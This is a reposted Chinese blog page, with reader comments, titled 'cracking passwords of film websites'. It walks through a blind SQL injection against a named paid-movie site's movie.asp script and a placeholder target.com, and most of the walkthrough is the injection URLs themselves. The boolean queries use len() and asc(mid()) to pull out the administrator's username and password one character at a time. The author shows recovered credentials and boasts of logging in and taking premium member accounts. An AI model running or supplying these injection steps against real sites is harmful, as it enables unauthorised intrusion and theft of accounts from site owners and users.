>> 电脑

破解影视网站的密码

2008-04-29 11:53:32转自 e百度 | 508人转藏 | 放进我的口袋

  请先进这个http://2000x.be/forumTopicRead.asp?id=702了解一下收费电影网站的常见漏洞文件!

  首先我们检查http://hhzl.qlmu.com/movie/movie.asp?id=56,先来测试一下,在最后加‘‘来检查是否有漏洞,http://hhzl.qlmu.com/movie/movie.asp?id=56’,出现提示出现访问错误,请勿尝试任何非法参数访问!,说明该文件过滤了代码‘,我们找个无代码过滤来测试,我们开始测试管理员帐号的位数,因为保存管理员帐号的字段名为name,所以语句为:

  http://www.target.com/movie.asp?id=330and1=(selectidfrompasswordwherelen(name)>4)

  正常返回页面,由此我们可以知道管理员的帐号是大于4位的!

  我们继续,

  http://www.target.com/movie.asp?id=330and1=(selectidfrompasswordwherelen(name)>

  "无法显示网页",出错了,由此我们可以知道管理员的帐号是大于等于8位的

  我们再来,

  http://www.target.com/movie.asp?id=330and1=(selectidfrompasswordwherelen(name)=8)

  正常返回页面,好极了,由此得出

  name为8位

  同样

  http://www.target.com/movie.asp?id=330and1=(selectidfrompasswordwherelen(pwd)=21)

  正常返回页面

  pwd为21位,TNND的,这么长!

  不管了,我们接下来开始测试管理员的用户名

  http://www.target.com/movie.asp?id=320and1=(selectidfrompasswordwhereasc(mid(name,1,1))>50)

  正常返回页面,看来还不够大.

  注:mid函数可以把密码分成若干部分取出,使用方法mid(字符串,起始位,取出的字符串的长度)

  http://www.target.com/movie.asp?id=320and1=(selectidfrompasswordwhereasc(mid(name,1,1))>100)

  "无法显示页面",看来比100还小.

  http://www.target.com/movie.asp?id=320and1=(selectidfrompasswordwhereasc(mid(name,1,1))=100)

  正常返回页面,于是我们可以得到管理员的用户名第一位的asc码为:100

  通过查询asc码表可以得到,

  name的第一位为:d

  接下来顺利的得到了name=darkeyes^

  然后我们开始测试pwd,呼,有21位啊,真是路漫漫其修远啊!

  http://www.target.com/movie.asp?id=320and1=(selectidfrompasswordwhereasc(mid(pwd,1,1))>100)

  正常显示页面,再来

  http://www.target.com/movie.asp?id=320and1=(selectidfrompasswordwhereasc(mid(pwd,1,1))>110)

  "无法显示页面",比110小哦,呵呵

  http://www.target.com/movie.asp?id=320and1=(selectidfrompasswordwhereasc(mid(pwd,1,1))=102)

  正常显示页面,对了,得到

  pwd的第一位为:f

  最后顺利的得到了

  pwd=xyfsdb7ew8y654231123d

  找到管理页面,登录进去,拿了几个黄金会员的帐号,就去慢慢欣赏movies了,呵呵

  下一个:电影网站高级会员FTP帐号

回复吕秀才

华丽的飘过…………

2007-08-27 18:57:33

回复horryli

2007-08-27 19:23:41

回复flh19900708

hao

2007-08-27 20:35:00

回复flh19900708

好啊

2007-08-27 20:35:18

回复s2877

2007-08-27 22:31:33

回复缘崎識

2007-08-28 21:44:48

回复gaoshoumy

太有才了!

2007-08-28 22:38:08

回复凰music帝

2007-08-30 00:17:50

回复云龙要亮剑

2007-09-01 20:12:57

10.

回复访客121.41.90.*

怕怕。。。。

2007-09-02 13:37:18

首页 1 [2] [3] 下一页 尾页

我要评论

开心 伤心 惊讶 酷 感动 无聊 鲜花 顶 汗 愤怒 赞 呕吐 无语 色 害羞 调皮 砸 尴尬 疑问 心碎 炸弹 关注 财富 可爱

匿名发表 登陆 | 注册

 请大伙在灌溉口袋时,注意语言文明,爱护口袋,支持口袋的主人

返回顶部

Copyright ©2008 Qihoo.com All Rights Reserved 版权所有·奇虎网 意见反馈 | 免责声明 | 口袋帮助